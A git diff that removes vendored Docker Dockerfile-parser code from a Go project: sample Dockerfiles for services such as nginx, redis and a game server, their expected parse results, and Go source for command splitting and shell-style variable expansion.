diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/result
deleted file mode 100644
index 1ffbb8ff85..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/result
+++ /dev/null
@@ -1 +0,0 @@
-(cmd "[\"echo\", \"Please, close the brackets when you're done\"")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/Dockerfile
deleted file mode 100644
index 30cc4bb48f..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/Dockerfile
+++ /dev/null
@@ -1 +0,0 @@
-CMD ["echo", "look ma, no quote!]
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/result
deleted file mode 100644
index 32048147b5..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/result
+++ /dev/null
@@ -1 +0,0 @@
-(cmd "[\"echo\", \"look ma, no quote!]")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/Dockerfile
deleted file mode 100644
index a586917110..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/Dockerfile
+++ /dev/null
@@ -1,8 +0,0 @@
-CMD []
-CMD [""]
-CMD ["a"]
-CMD ["a","b"]
-CMD [ "a", "b" ]
-CMD [	"a",	"b"	]
-CMD	[	"a",	"b"	]	
-CMD ["abc 123", "♥", "☃", "\" \\ \/ \b \f \n \r \t \u0000"]
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/result
deleted file mode 100644
index c6553e6e1a..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/result
+++ /dev/null
@@ -1,8 +0,0 @@
-(cmd)
-(cmd "")
-(cmd "a")
-(cmd "a" "b")
-(cmd "a" "b")
-(cmd "a" "b")
-(cmd "a" "b")
-(cmd "abc 123" "♥" "☃" "\" \\ / \b \f \n \r \t \x00")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/Dockerfile
deleted file mode 100644
index 35f9c24aa6..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/Dockerfile
+++ /dev/null
@@ -1,7 +0,0 @@
-FROM ubuntu:14.04
-MAINTAINER James Turnbull "james@example.com"
-ENV REFRESHED_AT 2014-06-01
-RUN apt-get update
-RUN apt-get -y install redis-server redis-tools
-EXPOSE 6379
-ENTRYPOINT [ "/usr/bin/redis-server" ]
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/result
deleted file mode 100644
index b5ac6fe445..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/result
+++ /dev/null
@@ -1,7 +0,0 @@
-(from "ubuntu:14.04")
-(maintainer "James Turnbull \"james@example.com\"")
-(env "REFRESHED_AT" "2014-06-01")
-(run "apt-get update")
-(run "apt-get -y install redis-server redis-tools")
-(expose "6379")
-(entrypoint "/usr/bin/redis-server")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/Dockerfile
deleted file mode 100644
index 188395fe83..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/Dockerfile
+++ /dev/null
@@ -1,48 +0,0 @@
-FROM busybox:buildroot-2014.02
-
-MAINTAINER docker <docker@docker.io>
-
-ONBUILD RUN ["echo", "test"]
-ONBUILD RUN echo test
-ONBUILD COPY . /
-
-
-# RUN Commands \
-# linebreak in comment \
-RUN ["ls", "-la"]
-RUN ["echo", "'1234'"]
-RUN echo "1234"
-RUN echo 1234
-RUN echo '1234' && \
-    echo "456" && \
-    echo 789
-RUN    sh -c 'echo root:testpass \
-        > /tmp/passwd'
-RUN mkdir -p /test /test2 /test3/test
-
-# ENV \
-ENV SCUBA 1 DUBA 3
-ENV SCUBA "1 DUBA 3"
-
-# CMD \
-CMD ["echo", "test"]
-CMD echo test
-CMD echo "test"
-CMD echo 'test'
-CMD echo 'test' | wc -
-
-#EXPOSE\
-EXPOSE 3000
-EXPOSE 9000 5000 6000
-
-USER docker
-USER docker:root
-
-VOLUME ["/test"]
-VOLUME ["/test", "/test2"]
-VOLUME /test3
-
-WORKDIR /test
-
-ADD . /
-COPY . copy
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/result
deleted file mode 100644
index 6f7d57a396..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/result
+++ /dev/null
@@ -1,29 +0,0 @@
-(from "busybox:buildroot-2014.02")
-(maintainer "docker <docker@docker.io>")
-(onbuild (run "echo" "test"))
-(onbuild (run "echo test"))
-(onbuild (copy "." "/"))
-(run "ls" "-la")
-(run "echo" "'1234'")
-(run "echo \"1234\"")
-(run "echo 1234")
-(run "echo '1234' &&     echo \"456\" &&     echo 789")
-(run "sh -c 'echo root:testpass         > /tmp/passwd'")
-(run "mkdir -p /test /test2 /test3/test")
-(env "SCUBA" "1 DUBA 3")
-(env "SCUBA" "\"1 DUBA 3\"")
-(cmd "echo" "test")
-(cmd "echo test")
-(cmd "echo \"test\"")
-(cmd "echo 'test'")
-(cmd "echo 'test' | wc -")
-(expose "3000")
-(expose "9000" "5000" "6000")
-(user "docker")
-(user "docker:root")
-(volume "/test")
-(volume "/test" "/test2")
-(volume "/test3")
-(workdir "/test")
-(add "." "/")
-(copy "." "copy")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/Dockerfile
deleted file mode 100644
index f64c1168c1..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/Dockerfile
+++ /dev/null
@@ -1,16 +0,0 @@
-FROM ubuntu:14.04
-
-RUN apt-get update -qy && apt-get install mutt offlineimap vim-nox abook elinks curl tmux cron zsh -y
-ADD .muttrc /
-ADD .offlineimaprc /
-ADD .tmux.conf /
-ADD mutt /.mutt
-ADD vim /.vim
-ADD vimrc /.vimrc
-ADD crontab /etc/crontab
-RUN chmod 644 /etc/crontab
-RUN mkdir /Mail
-RUN mkdir /.offlineimap
-RUN echo "export TERM=screen-256color" >/.zshenv
-
-CMD setsid cron; tmux -2
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/result
deleted file mode 100644
index a0efcf04b6..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/result
+++ /dev/null
@@ -1,14 +0,0 @@
-(from "ubuntu:14.04")
-(run "apt-get update -qy && apt-get install mutt offlineimap vim-nox abook elinks curl tmux cron zsh -y")
-(add ".muttrc" "/")
-(add ".offlineimaprc" "/")
-(add ".tmux.conf" "/")
-(add "mutt" "/.mutt")
-(add "vim" "/.vim")
-(add "vimrc" "/.vimrc")
-(add "crontab" "/etc/crontab")
-(run "chmod 644 /etc/crontab")
-(run "mkdir /Mail")
-(run "mkdir /.offlineimap")
-(run "echo \"export TERM=screen-256color\" >/.zshenv")
-(cmd "setsid cron; tmux -2")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/Dockerfile
deleted file mode 100644
index 57bb5976a3..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/Dockerfile
+++ /dev/null
@@ -1,3 +0,0 @@
-FROM foo
-
-VOLUME /opt/nagios/var /opt/nagios/etc /opt/nagios/libexec /var/log/apache2 /usr/share/snmp/mibs
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/result
deleted file mode 100644
index 18dbdeeaa0..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/result
+++ /dev/null
@@ -1,2 +0,0 @@
-(from "foo")
-(volume "/opt/nagios/var" "/opt/nagios/etc" "/opt/nagios/libexec" "/var/log/apache2" "/usr/share/snmp/mibs")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/Dockerfile
deleted file mode 100644
index 5b9ec06a6c..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/Dockerfile
+++ /dev/null
@@ -1,7 +0,0 @@
-FROM ubuntu:14.04
-
-RUN apt-get update && apt-get install libcap2-bin mumble-server -y
-
-ADD ./mumble-server.ini /etc/mumble-server.ini
-
-CMD /usr/sbin/murmurd
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/result
deleted file mode 100644
index a0036a943e..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/result
+++ /dev/null
@@ -1,4 +0,0 @@
-(from "ubuntu:14.04")
-(run "apt-get update && apt-get install libcap2-bin mumble-server -y")
-(add "./mumble-server.ini" "/etc/mumble-server.ini")
-(cmd "/usr/sbin/murmurd")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/Dockerfile
deleted file mode 100644
index bf8368e1ca..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/Dockerfile
+++ /dev/null
@@ -1,14 +0,0 @@
-FROM ubuntu:14.04
-MAINTAINER Erik Hollensbe <erik@hollensbe.org>
-
-RUN apt-get update && apt-get install nginx-full -y
-RUN rm -rf /etc/nginx
-ADD etc /etc/nginx
-RUN chown -R root:root /etc/nginx
-RUN /usr/sbin/nginx -qt
-RUN mkdir /www
-
-CMD ["/usr/sbin/nginx"]
-
-VOLUME /www
-EXPOSE 80
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/result
deleted file mode 100644
index 56ddb6f258..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/result
+++ /dev/null
@@ -1,11 +0,0 @@
-(from "ubuntu:14.04")
-(maintainer "Erik Hollensbe <erik@hollensbe.org>")
-(run "apt-get update && apt-get install nginx-full -y")
-(run "rm -rf /etc/nginx")
-(add "etc" "/etc/nginx")
-(run "chown -R root:root /etc/nginx")
-(run "/usr/sbin/nginx -qt")
-(run "mkdir /www")
-(cmd "/usr/sbin/nginx")
-(volume "/www")
-(expose "80")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/Dockerfile
deleted file mode 100644
index 72b79bdd7d..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/Dockerfile
+++ /dev/null
@@ -1,23 +0,0 @@
-FROM ubuntu:12.04
-
-EXPOSE 27015
-EXPOSE 27005
-EXPOSE 26901
-EXPOSE 27020
-
-RUN apt-get update && apt-get install libc6-dev-i386 curl unzip -y
-RUN mkdir -p /steam
-RUN curl http://media.steampowered.com/client/steamcmd_linux.tar.gz | tar vxz -C /steam
-ADD ./script /steam/script
-RUN /steam/steamcmd.sh +runscript /steam/script
-RUN curl http://mirror.pointysoftware.net/alliedmodders/mmsource-1.10.0-linux.tar.gz | tar vxz -C /steam/tf2/tf
-RUN curl http://mirror.pointysoftware.net/alliedmodders/sourcemod-1.5.3-linux.tar.gz | tar vxz -C /steam/tf2/tf
-ADD ./server.cfg /steam/tf2/tf/cfg/server.cfg
-ADD ./ctf_2fort.cfg /steam/tf2/tf/cfg/ctf_2fort.cfg
-ADD ./sourcemod.cfg /steam/tf2/tf/cfg/sourcemod/sourcemod.cfg
-RUN rm -r /steam/tf2/tf/addons/sourcemod/configs
-ADD ./configs /steam/tf2/tf/addons/sourcemod/configs
-RUN mkdir -p /steam/tf2/tf/addons/sourcemod/translations/en
-RUN cp /steam/tf2/tf/addons/sourcemod/translations/*.txt /steam/tf2/tf/addons/sourcemod/translations/en
-
-CMD cd /steam/tf2 && ./srcds_run -port 27015 +ip 0.0.0.0 +map ctf_2fort -autoupdate -steam_dir /steam -steamcmd_script /steam/script +tf_bot_quota 12 +tf_bot_quota_mode fill
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/result
deleted file mode 100644
index d4f94cd8be..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/result
+++ /dev/null
@@ -1,20 +0,0 @@
-(from "ubuntu:12.04")
-(expose "27015")
-(expose "27005")
-(expose "26901")
-(expose "27020")
-(run "apt-get update && apt-get install libc6-dev-i386 curl unzip -y")
-(run "mkdir -p /steam")
-(run "curl http://media.steampowered.com/client/steamcmd_linux.tar.gz | tar vxz -C /steam")
-(add "./script" "/steam/script")
-(run "/steam/steamcmd.sh +runscript /steam/script")
-(run "curl http://mirror.pointysoftware.net/alliedmodders/mmsource-1.10.0-linux.tar.gz | tar vxz -C /steam/tf2/tf")
-(run "curl http://mirror.pointysoftware.net/alliedmodders/sourcemod-1.5.3-linux.tar.gz | tar vxz -C /steam/tf2/tf")
-(add "./server.cfg" "/steam/tf2/tf/cfg/server.cfg")
-(add "./ctf_2fort.cfg" "/steam/tf2/tf/cfg/ctf_2fort.cfg")
-(add "./sourcemod.cfg" "/steam/tf2/tf/cfg/sourcemod/sourcemod.cfg")
-(run "rm -r /steam/tf2/tf/addons/sourcemod/configs")
-(add "./configs" "/steam/tf2/tf/addons/sourcemod/configs")
-(run "mkdir -p /steam/tf2/tf/addons/sourcemod/translations/en")
-(run "cp /steam/tf2/tf/addons/sourcemod/translations/*.txt /steam/tf2/tf/addons/sourcemod/translations/en")
-(cmd "cd /steam/tf2 && ./srcds_run -port 27015 +ip 0.0.0.0 +map ctf_2fort -autoupdate -steam_dir /steam -steamcmd_script /steam/script +tf_bot_quota 12 +tf_bot_quota_mode fill")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/Dockerfile
deleted file mode 100644
index 4842088166..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/Dockerfile
+++ /dev/null
@@ -1,9 +0,0 @@
-FROM ubuntu:14.04
-
-RUN apt-get update -qy && apt-get install tmux zsh weechat-curses -y
-
-ADD .weechat /.weechat
-ADD .tmux.conf /
-RUN echo "export TERM=screen-256color" >/.zshenv
-
-CMD zsh -c weechat
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/result
deleted file mode 100644
index c3abb4c54f..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/result
+++ /dev/null
@@ -1,6 +0,0 @@
-(from "ubuntu:14.04")
-(run "apt-get update -qy && apt-get install tmux zsh weechat-curses -y")
-(add ".weechat" "/.weechat")
-(add ".tmux.conf" "/")
-(run "echo \"export TERM=screen-256color\" >/.zshenv")
-(cmd "zsh -c weechat")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/Dockerfile
deleted file mode 100644
index 3a4da6e916..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/Dockerfile
+++ /dev/null
@@ -1,7 +0,0 @@
-FROM ubuntu:14.04
-MAINTAINER Erik Hollensbe <erik@hollensbe.org>
-
-RUN apt-get update && apt-get install znc -y
-ADD conf /.znc
-
-CMD [ "/usr/bin/znc", "-f", "-r" ]
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/result
deleted file mode 100644
index 5493b255fd..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/result
+++ /dev/null
@@ -1,5 +0,0 @@
-(from "ubuntu:14.04")
-(maintainer "Erik Hollensbe <erik@hollensbe.org>")
-(run "apt-get update && apt-get install znc -y")
-(add "conf" "/.znc")
-(cmd "/usr/bin/znc" "-f" "-r")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/utils.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/utils.go
deleted file mode 100644
index cd7af75e79..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/utils.go
+++ /dev/null
@@ -1,176 +0,0 @@
-package parser
-
-import (
-	"fmt"
-	"strconv"
-	"strings"
-	"unicode"
-)
-
-// Dump dumps the AST defined by `node` as a list of sexps.
-// Returns a string suitable for printing.
-func (node *Node) Dump() string {
-	str := ""
-	str += node.Value
-
-	if len(node.Flags) > 0 {
-		str += fmt.Sprintf(" %q", node.Flags)
-	}
-
-	for _, n := range node.Children {
-		str += "(" + n.Dump() + ")\n"
-	}
-
-	if node.Next != nil {
-		for n := node.Next; n != nil; n = n.Next {
-			if len(n.Children) > 0 {
-				str += " " + n.Dump()
-			} else {
-				str += " " + strconv.Quote(n.Value)
-			}
-		}
-	}
-
-	return strings.TrimSpace(str)
-}
-
-// performs the dispatch based on the two primal strings, cmd and args. Please
-// look at the dispatch table in parser.go to see how these dispatchers work.
-func fullDispatch(cmd, args string, d *Directive) (*Node, map[string]bool, error) {
-	fn := dispatch[cmd]
-
-	// Ignore invalid Dockerfile instructions
-	if fn == nil {
-		fn = parseIgnore
-	}
-
-	sexp, attrs, err := fn(args, d)
-	if err != nil {
-		return nil, nil, err
-	}
-
-	return sexp, attrs, nil
-}
-
-// splitCommand takes a single line of text and parses out the cmd and args,
-// which are used for dispatching to more exact parsing functions.
-func splitCommand(line string) (string, []string, string, error) {
-	var args string
-	var flags []string
-
-	// Make sure we get the same results irrespective of leading/trailing spaces
-	cmdline := tokenWhitespace.Split(strings.TrimSpace(line), 2)
-	cmd := strings.ToLower(cmdline[0])
-
-	if len(cmdline) == 2 {
-		var err error
-		args, flags, err = extractBuilderFlags(cmdline[1])
-		if err != nil {
-			return "", nil, "", err
-		}
-	}
-
-	return cmd, flags, strings.TrimSpace(args), nil
-}
-
-// covers comments and empty lines. Lines should be trimmed before passing to
-// this function.
-func stripComments(line string) string {
-	// string is already trimmed at this point
-	if tokenComment.MatchString(line) {
-		return tokenComment.ReplaceAllString(line, "")
-	}
-
-	return line
-}
-
-func extractBuilderFlags(line string) (string, []string, error) {
-	// Parses the BuilderFlags and returns the remaining part of the line
-
-	const (
-		inSpaces = iota // looking for start of a word
-		inWord
-		inQuote
-	)
-
-	words := []string{}
-	phase := inSpaces
-	word := ""
-	quote := '\000'
-	blankOK := false
-	var ch rune
-
-	for pos := 0; pos <= len(line); pos++ {
-		if pos != len(line) {
-			ch = rune(line[pos])
-		}
-
-		if phase == inSpaces { // Looking for start of word
-			if pos == len(line) { // end of input
-				break
-			}
-			if unicode.IsSpace(ch) { // skip spaces
-				continue
-			}
-
-			// Only keep going if the next word starts with --
-			if ch != '-' || pos+1 == len(line) || rune(line[pos+1]) != '-' {
-				return line[pos:], words, nil
-			}
-
-			phase = inWord // found someting with "--", fall through
-		}
-		if (phase == inWord || phase == inQuote) && (pos == len(line)) {
-			if word != "--" && (blankOK || len(word) > 0) {
-				words = append(words, word)
-			}
-			break
-		}
-		if phase == inWord {
-			if unicode.IsSpace(ch) {
-				phase = inSpaces
-				if word == "--" {
-					return line[pos:], words, nil
-				}
-				if blankOK || len(word) > 0 {
-					words = append(words, word)
-				}
-				word = ""
-				blankOK = false
-				continue
-			}
-			if ch == '\'' || ch == '"' {
-				quote = ch
-				blankOK = true
-				phase = inQuote
-				continue
-			}
-			if ch == '\\' {
-				if pos+1 == len(line) {
-					continue // just skip \ at end
-				}
-				pos++
-				ch = rune(line[pos])
-			}
-			word += string(ch)
-			continue
-		}
-		if phase == inQuote {
-			if ch == quote {
-				phase = inWord
-				continue
-			}
-			if ch == '\\' {
-				if pos+1 == len(line) {
-					phase = inWord
-					continue // just skip \ at end
-				}
-				pos++
-				ch = rune(line[pos])
-			}
-			word += string(ch)
-		}
-	}
-
-	return "", words, nil
-}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/shell_parser.go b/vendor/github.com/docker/docker/builder/dockerfile/shell_parser.go
deleted file mode 100644
index 189afd1fdb..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/shell_parser.go
+++ /dev/null
@@ -1,329 +0,0 @@
-package dockerfile
-
-// This will take a single word and an array of env variables and
-// process all quotes (" and ') as well as $xxx and ${xxx} env variable
-// tokens.  Tries to mimic bash shell process.
-// It doesn't support all flavors of ${xx:...} formats but new ones can
-// be added by adding code to the "special ${} format processing" section
-
-import (
-	"fmt"
-	"runtime"
-	"strings"
-	"text/scanner"
-	"unicode"
-)
-
-type shellWord struct {
-	word        string
-	scanner     scanner.Scanner
-	envs        []string
-	pos         int
-	escapeToken rune
-}
-
-// ProcessWord will use the 'env' list of environment variables,
-// and replace any env var references in 'word'.
-func ProcessWord(word string, env []string, escapeToken rune) (string, error) {
-	sw := &shellWord{
-		word:        word,
-		envs:        env,
-		pos:         0,
-		escapeToken: escapeToken,
-	}
-	sw.scanner.Init(strings.NewReader(word))
-	word, _, err := sw.process()
-	return word, err
-}
-
-// ProcessWords will use the 'env' list of environment variables,
-// and replace any env var references in 'word' then it will also
-// return a slice of strings which represents the 'word'
-// split up based on spaces - taking into account quotes.  Note that
-// this splitting is done **after** the env var substitutions are done.
-// Note, each one is trimmed to remove leading and trailing spaces (unless
-// they are quoted", but ProcessWord retains spaces between words.
-func ProcessWords(word string, env []string, escapeToken rune) ([]string, error) {
-	sw := &shellWord{
-		word:        word,
-		envs:        env,
-		pos:         0,
-		escapeToken: escapeToken,
-	}
-	sw.scanner.Init(strings.NewReader(word))
-	_, words, err := sw.process()
-	return words, err
-}
-
-func (sw *shellWord) process() (string, []string, error) {
-	return sw.processStopOn(scanner.EOF)
-}
-
-type wordsStruct struct {
-	word   string
-	words  []string
-	inWord bool
-}
-
-func (w *wordsStruct) addChar(ch rune) {
-	if unicode.IsSpace(ch) && w.inWord {
-		if len(w.word) != 0 {
-			w.words = append(w.words, w.word)
-			w.word = ""
-			w.inWord = false
-		}
-	} else if !unicode.IsSpace(ch) {
-		w.addRawChar(ch)
-	}
-}
-
-func (w *wordsStruct) addRawChar(ch rune) {
-	w.word += string(ch)
-	w.inWord = true
-}
-
-func (w *wordsStruct) addString(str string) {
-	var scan scanner.Scanner
-	scan.Init(strings.NewReader(str))
-	for scan.Peek() != scanner.EOF {
-		w.addChar(scan.Next())
-	}
-}
-
-func (w *wordsStruct) addRawString(str string) {
-	w.word += str
-	w.inWord = true
-}
-
-func (w *wordsStruct) getWords() []string {
-	if len(w.word) > 0 {
-		w.words = append(w.words, w.word)
-
-		// Just in case we're called again by mistake
-		w.word = ""
-		w.inWord = false
-	}
-	return w.words
-}
-
-// Process the word, starting at 'pos', and stop when we get to the
-// end of the word or the 'stopChar' character
-func (sw *shellWord) processStopOn(stopChar rune) (string, []string, error) {
-	var result string
-	var words wordsStruct
-
-	var charFuncMapping = map[rune]func() (string, error){
-		'\'': sw.processSingleQuote,
-		'"':  sw.processDoubleQuote,
-		'$':  sw.processDollar,
-	}
-
-	for sw.scanner.Peek() != scanner.EOF {
-		ch := sw.scanner.Peek()
-
-		if stopChar != scanner.EOF && ch == stopChar {
-			sw.scanner.Next()
-			break
-		}
-		if fn, ok := charFuncMapping[ch]; ok {
-			// Call special processing func for certain chars
-			tmp, err := fn()
-			if err != nil {
-				return "", []string{}, err
-			}
-			result += tmp
-
-			if ch == rune('$') {
-				words.addString(tmp)
-			} else {
-				words.addRawString(tmp)
-			}
-		} else {
-			// Not special, just add it to the result
-			ch = sw.scanner.Next()
-
-			if ch == sw.escapeToken {
-				// '\' (default escape token, but ` allowed) escapes, except end of line
-
-				ch = sw.scanner.Next()
-
-				if ch == scanner.EOF {
-					break
-				}
-
-				words.addRawChar(ch)
-			} else {
-				words.addChar(ch)
-			}
-
-			result += string(ch)
-		}
-	}
-
-	return result, words.getWords(), nil
-}
-
-func (sw *shellWord) processSingleQuote() (string, error) {
-	// All chars between single quotes are taken as-is
-	// Note, you can't escape '
-	var result string
-
-	sw.scanner.Next()
-
-	for {
-		ch := sw.scanner.Next()
-		if ch == '\'' || ch == scanner.EOF {
-			break
-		}
-		result += string(ch)
-	}
-
-	return result, nil
-}
-
-func (sw *shellWord) processDoubleQuote() (string, error) {
-	// All chars up to the next " are taken as-is, even ', except any $ chars
-	// But you can escape " with a \ (or ` if escape token set accordingly)
-	var result string
-
-	sw.scanner.Next()
-
-	for sw.scanner.Peek() != scanner.EOF {
-		ch := sw.scanner.Peek()
-		if ch == '"' {
-			sw.scanner.Next()
-			break
-		}
-		if ch == '$' {
-			tmp, err := sw.processDollar()
-			if err != nil {
-				return "", err
-			}
-			result += tmp
-		} else {
-			ch = sw.scanner.Next()
-			if ch == sw.escapeToken {
-				chNext := sw.scanner.Peek()
-
-				if chNext == scanner.EOF {
-					// Ignore \ at end of word
-					continue
-				}
-
-				if chNext == '"' || chNext == '$' {
-					// \" and \$ can be escaped, all other \'s are left as-is
-					ch = sw.scanner.Next()
-				}
-			}
-			result += string(ch)
-		}
-	}
-
-	return result, nil
-}
-
-func (sw *shellWord) processDollar() (string, error) {
-	sw.scanner.Next()
-	ch := sw.scanner.Peek()
-	if ch == '{' {
-		sw.scanner.Next()
-		name := sw.processName()
-		ch = sw.scanner.Peek()
-		if ch == '}' {
-			// Normal ${xx} case
-			sw.scanner.Next()
-			return sw.getEnv(name), nil
-		}
-		if ch == ':' {
-			// Special ${xx:...} format processing
-			// Yes it allows for recursive $'s in the ... spot
-
-			sw.scanner.Next() // skip over :
-			modifier := sw.scanner.Next()
-
-			word, _, err := sw.processStopOn('}')
-			if err != nil {
-				return "", err
-			}
-
-			// Grab the current value of the variable in question so we
-			// can use to to determine what to do based on the modifier
-			newValue := sw.getEnv(name)
-
-			switch modifier {
-			case '+':
-				if newValue != "" {
-					newValue = word
-				}
-				return newValue, nil
-
-			case '-':
-				if newValue == "" {
-					newValue = word
-				}
-				return newValue, nil
-
-			default:
-				return "", fmt.Errorf("Unsupported modifier (%c) in substitution: %s", modifier, sw.word)
-			}
-		}
-		return "", fmt.Errorf("Missing ':' in substitution: %s", sw.word)
-	}
-	// $xxx case
-	name := sw.processName()
-	if name == "" {
-		return "$", nil
-	}
-	return sw.getEnv(name), nil
-}
-
-func (sw *shellWord) processName() string {
-	// Read in a name (alphanumeric or _)
-	// If it starts with a numeric then just return $#
-	var name string
-
-	for sw.scanner.Peek() != scanner.EOF {
-		ch := sw.scanner.Peek()
-		if len(name) == 0 && unicode.IsDigit(ch) {
-			ch = sw.scanner.Next()
-			return string(ch)
-		}
-		if !unicode.IsLetter(ch) && !unicode.IsDigit(ch) && ch != '_' {
-			break
-		}
-		ch = sw.scanner.Next()
-		name += string(ch)
-	}
-
-	return name
-}
-
-func (sw *shellWord) getEnv(name string) string {
-	if runtime.GOOS == "windows" {
-		// Case-insensitive environment variables on Windows
-		name = strings.ToUpper(name)
-	}
-	for _, env := range sw.envs {
-		i := strings.Index(env, "=")
-		if i < 0 {
-			if runtime.GOOS == "windows" {
-				env = strings.ToUpper(env)
-			}
-			if name == env {
-				// Should probably never get here, but just in case treat
-				// it like "var" and "var=" are the same
-				return ""
-			}
-			continue
-		}
-		compareName := env[:i]
-		if runtime.GOOS == "windows" {
-			compareName = strings.ToUpper(compareName)
-		}
-		if name != compareName {
-			continue
-		}
-		return env[i+1:]
-	}
-	return ""
-}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/shell_parser_test.go b/vendor/github.com/docker/docker/builder/dockerfile/shell_parser_test.go
deleted file mode 100644
index 6cf691c077..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/shell_parser_test.go
+++ /dev/null
@@ -1,155 +0,0 @@
-package dockerfile
-
-import (
-	"bufio"
-	"os"
-	"runtime"
-	"strings"
-	"testing"
-)
-
